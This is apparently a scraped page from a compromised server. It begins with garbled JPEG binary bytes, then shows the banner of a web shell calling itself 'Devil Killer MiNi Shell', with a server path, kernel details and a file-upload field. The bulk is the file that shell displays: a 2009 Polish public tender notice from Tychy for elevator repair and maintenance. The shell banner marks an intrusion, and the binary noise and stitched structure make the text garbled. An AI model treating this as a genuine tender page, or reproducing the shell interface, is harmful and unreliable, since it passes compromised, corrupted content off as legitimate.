JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090430/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090430/129162-N-2009.html

<p class="kh_header"><b>Tychy: Naprawa i konserwacja dźwigów osobowych w budynkach mieszkalnych
i niemieszkalnych administrowanych przez  ROM Nr  I ÷ V w Tychach</b><br>
<b>Numer ogłoszenia: 129162 - 2009; data zamieszczenia: 30.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka  Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Naprawa i konserwacja dźwigów osobowych w budynkach mieszkalnych
i niemieszkalnych administrowanych przez  ROM Nr  I ÷ V w Tychach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia są usługi w zakresie technicznego utrzymania urządzeń
            dźwigowych, polegającym na prowadzeniu bieżącej konserwacji,  usuwaniu awarii wraz ze
            świadczeniem czynności pogotowia technicznego oraz wykonywaniu napraw w zakresie
            wykraczającym poza czynności konserwacyjne w budynkach mieszkalnych i niemieszkalnych,
            administrowanych przez ROM Nr  I ÷ V w Tychach, z podziałem na 2 części zwane dalej
            zadaniami, dotyczące:    

            Zadanie Nr 1 - Naprawy i konserwacji dźwigów osobowych w budynkach mieszkalnych 
            i niemieszkalnych administrowanych przez  ROM Nr  I ÷ V w Tychach

            Zadanie Nr 2 - Naprawy i konserwacji dźwigów osobowych w budynku użyteczności
            publicznej Balbina Centrum położonego w Tychach przy ulicy Barona 30

             Wykaz dźwigów ich charakterystykę zawiera:
           - dla Zadania Nr 1 - Załącznik Nr 1 do SIWZ.
           - dla Zadania Nr 2 - Załącznik Nr 2 do SIWZ.

            Zakres usług dla Zadania Nr 1 i 2 obejmuje m.in.:
        1. Do obowiązków Wykonawcy należy dbanie o spełnienie warunków wynikających z
            zakresu przeglądów P1 i P2, w szczególności dbanie o:
        1) należyty stan techniczny wszelkich mechanizmów napędowych ;
        2) należyte działanie urządzeń i układów sterowych ;
        3) należyte działanie urządzeń bezpieczeństwa, drzwi przystankowych i drzwi kabinowych ;
        4) należyte działanie urządzeń chwytających, stanu cięgien i lin nośnych, ich zamocowań 
            i elementów zawieszenia;
        5) należyte działanie wskaźników sygnalizacji i oświetlenia w kabinie dźwigu ; 
        6) smarowanie wszystkich elementów wymagających smarowania ;
        7) utrzymanie w czystości maszynowni, podszybia i dachu kabiny ; 
        8) wykonywanie wszelkich niezbędnych pomiarów elektrycznych ;
        9) wykonywanie i przestrzeganie zaleceń i nakazów wydanych przez właściwy organ dozoru
            Technicznego ;


10) sprawdzanie urządzeń pod kątem jakości pracy ;
11) kontrola stanu oleju napędu ;

2. Ponadto Wykonawca zobowiązany jest:
 1) przestrzegać instrukcji konserwacji, usuwać na bieżąco usterki i inne nieprawidłowości 
     w działaniu urządzenia oraz dokonywać przeglądów w terminach określonych w instrukcji
     eksploatacji ;
 2) prowadzić dziennik konserwacji dźwigu poprzez dokonywanie zapisów wszelkich 
     wykonywanych czynności w terminach dokonanych konserwacji oraz przygotowywania 
     dźwigów i brania czynnego udziału w czasie przeprowadzania badań zwyczajnych i 
     nadzwyczajnych określonych przez dozór techniczny ;
3) zwracać uwagę i reagować na nieprawidłowości użytkowania urządzenia dźwigowego;
4) powiadamiać kierowników poszczególnych Rejonów Obsługi Mieszkańców 
   (dalej zwane ROM) o stwierdzonych przypadkach dewastacji, kradzieży lub wadliwej pracy
    dźwigu zwłaszcza wtedy, gdy może to mieć wpływ na bezpieczeństwo eksploatacji urządzenia ;
5) reprezentować Zamawiającego podczas kontroli przeprowadzonych przez Urząd Dozoru
    Technicznego zwany dalej UDT, służby p. poż. itd.;
6) przestrzegać terminów badań kontrolnych i konserwacyjnych dźwigu ;
7) wyprzedzająco informować kierowników poszczególnych ROM -ów o konieczności wykonania
    czynności zmierzających do bezawaryjnej pracy urządzenia;

3. Awarie:
    Usuwanie awarii wraz ze świadczeniem pogotowia technicznego polegać będzie na usuwaniu w
    sposób niezwłoczny zgłaszanych awarii. Nadto Wykonawca zobowiązany jest przyjmować
    zgłoszenia mieszkańców/użytkowników nieruchomości, w zakresie objętym przedmiotem
    zamówienia, reagować na zgłoszenie awarii do 10 minut od momentu przyjęcia zgłoszenia i
    usuwać awarie lub powiadomić kierownika danego ROM-u o konieczności wykonania naprawy
    wykraczającej poza zakres konserwacji, w terminie nie dłuższym niż 2 godziny od chwili
    otrzymania telefonicznego zgłoszenia.

4. Naprawy:
    Usługi wykraczające swym zakresem poza bieżącą konserwację.
    Konieczność wykonania czynności naprawczych dźwigu Wykonawca zgłosi do Kierownika 
    danego ROM - u  i  przedstawi kalkulację. 
    Przedstawiciel Rom -u  wystawi zlecenie na naprawę..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Informacja na temat wadium:    
          - dla Zadania Nr 1: 4 600,00 zł  
          - dla Zadania Nr 2: 750,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełnienia tych warunków:    
O zamówienie mogą ubiegać się Wykonawcy którzy spełniają warunki określone na podstawie art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych ( Dz. U. z 2006 r., Nr 164,poz. 1163 , Nr 170, poz. 1217 i Nr 227 ,poz. 1658, z 2007 r. Nr 64, poz. 427 i Nr 82, poz. 560 oraz z 2008 r. Nr 171, poz. 1058),  tj.:  
   -  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy
nakładają obowiązek posiadania takich uprawnień ; 
    - posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i
osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych
podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania
zamówienia; 
   -  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
   -  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
      art. 24 ust. 1 i 2 ustawy Pzp., 
       oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia.
                                
Ocena spełnienia ww. warunków zostanie dokonana zgodnie z formułą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Informacja o oświadczeniach lub dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:

Wykonawcy ubiegający się o zamówienie publiczne muszą złożyć oświadczenie, że spełniają warunki udziału w postępowaniu stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt. 1÷ 4 Ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych ( Dz. U. z 2006 r., Nr 164, poz. 1163 , Nr 170, poz. 1217 i Nr 227, poz. 1658, z 2007 r. Nr 64, poz. 427 i Nr 82 ,poz. 560 oraz z 2008 r. Nr 171, poz. 1058 ),

- wzór druku oświadczenia stanowi załącznik do niniejszej specyfikacji,
( W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
  oświadczenie o spełnianiu warunków udziału w postępowaniu Wykonawcy składają łącznie)

  Ocena spełnienia ww. warunku zostanie dokonana zgodnie z formułą spełnia / nie spełnia.

A.  Sytuacja podmiotowa wykonawców, w tym wymogi dotyczące wpisu do rejestru
      zawodowego lub handlowego:

         Informacje i formalności konieczne do dokonania oceny spełnienia wymogów:    
               
   1. W celu potwierdzenia, że Wykonawcy posiadają uprawnienia do wykonywania określonej 
       działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia oraz, że 
       nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo  
       zamówień publicznych, Wykonawcy zobowiązani są przedłożyć następujące dokumenty:  

  1)  aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do 
       ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
       lub zgłoszenia do ewidencji działalności gospodarcze - wystawiony  nie wcześniej 
       niż 6 miesięcy przed upływem terminu składania ofert ;   
   
 2)  dokument potwierdzający, że Wykonawca posiada uprawnienia Urzędu Dozoru Technicznego
      do modernizacji dźwigów ;    
 3) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego  
      oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego 
      potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat 
      oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , że uzyskał 
      przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub 
      wstrzymanie w całości wykonania decyzji właściwego organu- wystawionych nie wcześniej     
      niż 3 miesiące przed upływem terminu składania ofert ;

           - W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
       przedmiotowe dokumenty wymienione w punkcie 1) i 2) muszą być złożone dla każdego z nich.

2.  Stosownie do treści § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
     ( Dz. U. Nr 87, poz. 605, z późn. zm. ) w sprawie rodzajów dokumentów potwierdzających 
     spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich 
     może żądać Zamawiający od Wykonawcy:
1)  jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej  
     Polskiej, zamiast dokumentów, o których mowa powyżej w pkt. 1) i  2) - składa dokument lub 
     dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, 
     potwierdzające odpowiednio, że:  
     a)  nie otwarto jego likwidacji ani nie ogłoszono upadłości; 
     b)  nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne 
          albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty 
          zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;  
2)  jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce 
     zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie XII A.1. p.pkt. 1) i 2),  
     zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem,     
     właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub 
     gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma 
     siedzibę lub miejsce zamieszkania. 

     Ocena spełnienia ww. wymagań zostanie dokonana zgodnie z formułą spełnia / nie spełnia.

B.  Zdolność ekonomiczna i finansowa  
     Informacje i formalności konieczne do dokonania oceny spełnienia wymogów:

    W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej    
    zapewniającej wykonanie zamówienia Zamawiający wymaga, aby Wykonawca wykazał że:
1) jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, 
    o wartości ubezpieczenia nie mniejszej niż:

    dla Zadania Nr 1 : 150 000,00 zł
    dla Zadania Nr 2 :   25 000,00 zł


    Do oferty należy załączyć:
 a) aktualną polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest
      ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności -o wartości
     ubezpieczenia nie mniejszej niż:

     dla Zadania Nr 1 : 150 000,00 zł
      dla Zadania Nr 2 :   25 000,00 zł

     Kwotę ubezpieczenia wyrażoną w  innej walucie niż PLN ,Zamawiający przeliczy na PLN, 
     przyjmując do przeliczeń średni kurs danej waluty podany w dniu otwarcia ofert przez 
     Narodowy Bank Polski.


  - W przypadku podmiotów występujących wspólnie warunek ten Zamawiający uzna za spełniony, jeżeli 
    Wykonawcy składający ofertę wspólną będą spełniać go łącznie lub co najmniej jeden z wykonawców.  

    Ocena spełnienia ww. wymagań zostanie dokonana zgodnie z formułą spełnia / nie spełnia.	

C. Zdolność techniczna

    Informacje i formalności konieczne do dokonania oceny spełnienia wymogów:      
    W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz, że 
    dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, 
     Zamawiający wymaga, aby wykonawca wykazał, że:

1.  w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia  
     publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał    
     z należytą starannością co najmniej dwie usługi odpowiadającą swoim rodzajem i wartością  
     usługom stanowiącym przedmiot zamówienia -NALEŻY  WYKAZAĆ :

1)  DLA ZADANIA Nr 1 - co najmniej dwie usługi zrealizowane w ramach odrębnych umów, 
     polegające na wykonaniu napraw i konserwacji dźwigów o wartości każdej z tych usług nie
      mniejszej  niż 90 000,00 zł (brutto) 

     Do oferty należy załączyć:

 -  wykaz wykonanych usług zrealizowanych w ramach odrębnych umów, polegających na 
    wykonaniu napraw i konserwacji dźwigów o wartości każdej z tych usług nie mniejszej  niż 
    90 000,00 zł (brutto) oraz dokumenty potwierdzające, że usługi te zostały wykonane
     należycie. 

2)  DLA ZADANIA Nr 2 - co najmniej dwie usługi zrealizowane w ramach odrębnych umów, 
     polegające na wykonaniu napraw i konserwacji dźwigów o wartości każdej z tych usług nie
      mniejszej  niż 16 000,00 zł (brutto) 

     Do oferty należy załączyć:

 -  wykaz wykonanych usług zrealizowanych w ramach odrębnych umów, polegających na wykonaniu
    napraw i konserwacji dźwigów o wartości każdej z tych usług nie mniejszej  niż 16 000,00 zł (brutto)
    oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie. 

    Wykazy wykonanych usług o charakterze podobnym do przedmiotu zamówienia należy sporządzić wg
    wzoru druku stanowiącego załącznik do SIWZ. 

 - W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie lub co
   najmniej jeden z Wykonawców

2.  dysponuje lub będzie dysponował osobami które będą uczestniczyć w wykonywaniu zamówienia, w szczególności
      uprawnionymi do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalnościach niezbędnych do
     projektowania i wykonania robót budowlanych (art. 12 i 13 ustawy z dnia 7 lipca 1994 r. -Prawo Budowlane 
    (Dz. U. z 2006 r., Nr 156 , poz.118 z późn. zmianami), którzy są członkami Polskiej Izby Inżynierów Budownictwa (art. 6
     ustawy z dnia 15 grudnia 2000r. samorządach zawodowych, architektów, inżynierów budowlanych i Urbanistów, (Dz. U. z
     2001 r. Nr 5, poz. 42 z późn. zm.), tj. dla Zadanie Nr 1 i 2: 
1) osobą posiadającą uprawnienia do prowadzenia konserwacji, eksploatacji: dźwigów, dźwignic, wyciągarek, wyciągów itp.
2) co najmniej dwoma osobami posiadającymi uprawnienia do wykonania pracy na stanowisku eksploatacji urządzeń i
    instalacji elektroenergetycznych o napięciu 1 kV       
Do oferty należy załączyć:
wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć
w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności. 

Wykonawca, który wskaże w wykazie, osoby, którymi będzie dysponował winien złożyć pisemne
zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia  

Do wykazu należy dołączyć: 

1) uprawnienia do prowadzenia konserwacji, eksploatacji: dźwigów, dźwignic, wyciągarek, wyciągów itp.
2) uprawnienia do wykonania pracy na stanowisku eksploatacji urządzeń i instalacji elektroenergetycznych o napięciu 1 kV  
Wykaz wykonanych osób należy sporządzić wg wzoru druku stanowiącego załącznik do SIWZ.(W przypadku podmiotów występujących wspólnie warunek ten Wykonawcy mogą spełniać łącznie lub co najmniej jeden z Wykonawców)
3) posiada lub będzie posiadać punkt całodobowego pogotowia technicznego z zainstalowanym telefonem stacjonarnym 
Do oferty należy załączyć:
oświadczenie, że Wykonawca, posiada lub będzie posiadać punkt całodobowego pogotowia technicznego z zainstalowanym telefonem stacjonarnym 
- wzór druku oświadczenia stanowi załącznik do niniejszej specyfikacji,
( W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia oświadczenie o spełnianiu warunków udziału w postępowaniu Wykonawcy składają łącznie)


Ocena spełnienia ww. warunków zostanie dokonana zgodnie z formułą spełnia / nie spełnia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 60</li>
<li>2 - Stawka roboczogodziny kosztorysowej - % - 40</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.umtychy.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego -pok. 20 - cena 15 zł (brutto). Opłata dotyczy wykonawców, którzy odbiorą SIWZ osobiście lub złożą wniosek o jej
przekazanie za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2009 godzina 11:00, miejsce: Miejsce składania ofert: Miejski Zarząd Budynków Mieszkalnych w Tychach, 
          ul. Filaretów 31 -   SEKRETARIAT - pokój nr 15.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr 1 - Naprawy i konserwacji dźwigów osobowych w budynkach mieszkalnych 
            i niemieszkalnych administrowanych przez  ROM Nr  I ÷ V w Tychach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia są usługi w zakresie technicznego utrzymania urządzeń
dźwigowych, polegającym na prowadzeniu bieżącej konserwacji,  usuwaniu awarii wraz ze świadczeniem czynności pogotowia technicznego oraz wykonywaniu napraw w zakresie wykraczającym poza czynności konserwacyjne w budynkach mieszkalnych i niemieszkalnych, administrowanych przez ROM Nr  I ÷ V w Tychach


Wykaz dźwigów ich charakterystykę zawiera:
           - dla Zadania Nr 1 - Załącznik Nr 1 do SIWZ.


Zakres usług dla Zadania Nr 1 obejmuje m.in.:
        1. Do obowiązków Wykonawcy należy dbanie o spełnienie warunków wynikających z
            zakresu przeglądów P1 i P2, w szczególności dbanie o:
        1) należyty stan techniczny wszelkich mechanizmów napędowych ;
        2) należyte działanie urządzeń i układów sterowych ;
        3) należyte działanie urządzeń bezpieczeństwa, drzwi przystankowych i drzwi kabinowych ;
        4) należyte działanie urządzeń chwytających, stanu cięgien i lin nośnych, ich zamocowań 
            i elementów zawieszenia;
        5) należyte działanie wskaźników sygnalizacji i oświetlenia w kabinie dźwigu ; 
        6) smarowanie wszystkich elementów wymagających smarowania ;
        7) utrzymanie w czystości maszynowni, podszybia i dachu kabiny ; 
        8) wykonywanie wszelkich niezbędnych pomiarów elektrycznych ;
        9) wykonywanie i przestrzeganie zaleceń i nakazów wydanych przez właściwy organ dozoru
            Technicznego ;


10) sprawdzanie urządzeń pod kątem jakości pracy ;
11) kontrola stanu oleju napędu ;

2. Ponadto Wykonawca zobowiązany jest:
 1) przestrzegać instrukcji konserwacji, usuwać na bieżąco usterki i inne nieprawidłowości 
     w działaniu urządzenia oraz dokonywać przeglądów w terminach określonych w instrukcji
     eksploatacji ;
 2) prowadzić dziennik konserwacji dźwigu poprzez dokonywanie zapisów wszelkich 
     wykonywanych czynności w terminach dokonanych konserwacji oraz przygotowywania 
     dźwigów i brania czynnego udziału w czasie przeprowadzania badań zwyczajnych i 
     nadzwyczajnych określonych przez dozór techniczny ;
3) zwracać uwagę i reagować na nieprawidłowości użytkowania urządzenia dźwigowego;
4) powiadamiać kierowników poszczególnych Rejonów Obsługi Mieszkańców 
   (dalej zwane ROM) o stwierdzonych przypadkach dewastacji, kradzieży lub wadliwej pracy
    dźwigu zwłaszcza wtedy, gdy może to mieć wpływ na bezpieczeństwo eksploatacji urządzenia ;
5) reprezentować Zamawiającego podczas kontroli przeprowadzonych przez Urząd Dozoru
    Technicznego zwany dalej UDT, służby p. poż. itd.;
6) przestrzegać terminów badań kontrolnych i konserwacyjnych dźwigu ;
7) wyprzedzająco informować kierowników poszczególnych ROM -ów o konieczności wykonania
    czynności zmierzających do bezawaryjnej pracy urządzenia;

3. Awarie:
    Usuwanie awarii wraz ze świadczeniem pogotowia technicznego polegać będzie na usuwaniu w
    sposób niezwłoczny zgłaszanych awarii. Nadto Wykonawca zobowiązany jest przyjmować
    zgłoszenia mieszkańców/użytkowników nieruchomości, w zakresie objętym przedmiotem
    zamówienia, reagować na zgłoszenie awarii do 10 minut od momentu przyjęcia zgłoszenia i
    usuwać awarie lub powiadomić kierownika danego ROM-u o konieczności wykonania naprawy
    wykraczającej poza zakres konserwacji, w terminie nie dłuższym niż 2 godziny od chwili
    otrzymania telefonicznego zgłoszenia.

4. Naprawy:
    Usługi wykraczające swym zakresem poza bieżącą konserwację.
    Konieczność wykonania czynności naprawczych dźwigu Wykonawca zgłosi do Kierownika 
    danego ROM - u  i  przedstawi kalkulację. 
    Przedstawiciel Rom -u  wystawi zlecenie na naprawę..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.53.14.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Stawka roboczogodziny kosztorysowej -% - 40</li>
</ul>
</li>
</ul><br>
